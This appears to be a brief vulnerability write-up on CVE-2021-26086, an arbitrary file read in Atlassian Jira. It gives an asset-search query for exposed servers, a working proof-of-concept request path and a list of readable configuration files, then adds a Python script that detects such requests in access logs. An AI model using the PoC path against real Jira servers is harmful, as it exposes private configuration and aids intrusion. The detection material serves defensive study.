Atlassian Jira cfx arbitrary file reading vulnerability CVE-2021-26086
Vulnerability Description
Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include
Vulnerability Impact
Atlassian Jira Server/Data Center 8.4.0
Network asset search query
app="ATLASSIAN-JIRA"
Vulnerability reproduction
Login page
Verify POC
/s/cfx/_/;/WEB-INF/web.xml
Readable sensitive configuration files
WEB-INF/web.xml
WEB-INF/decorators.xml
WEB-INF/classes/seraph-config.xml
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
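Detecting this request pattern in logs
For detection, the following added example (not part of the original post) scans web access-log lines for requests whose path uses a ";" path-parameter segment to reach WEB-INF or META-INF, as in the PoC path above. The log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Directories a servlet container must never serve; taken from the file list above.
PROTECTED = ("web-inf", "meta-inf")
# Request line and status as they appear in common access-log formats (assumption).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2022:10:00:00 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 54321',
    '198.51.100.7 - - [01/Jan/2022:10:01:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 8123',
    '198.51.100.7 - - [01/Jan/2022:10:01:05 +0000] "GET /s/abc123/_/images/logo.png HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2022:10:02:00 +0000] "GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1" 404 0',
]


def normalize(path):
    """Drop the query string, percent-decode (bounded) and lowercase the path."""
    path = path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()


def is_suspicious(path):
    """True when a ';' path-parameter segment precedes or sits on WEB-INF/META-INF."""
    saw_param = False
    for seg in normalize(path).split("/"):
        if ";" in seg:
            saw_param = True
        if saw_param and seg.split(";", 1)[0] in PROTECTED:
            return True
    return False


def scan(lines):
    """Return (path, status) per matching line; a 200 suggests the file was returned."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append((m.group(1), int(m.group(2))))
    return hits


if __name__ == "__main__":
    for path, status in scan(SAMPLE_LOG):
        print("SERVED " if status == 200 else "blocked", status, path)
```

Hits with status 200 deserve priority review, since they indicate the protected file content was actually returned to the client.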
This post is licensed under CC BY 4.0 by the author.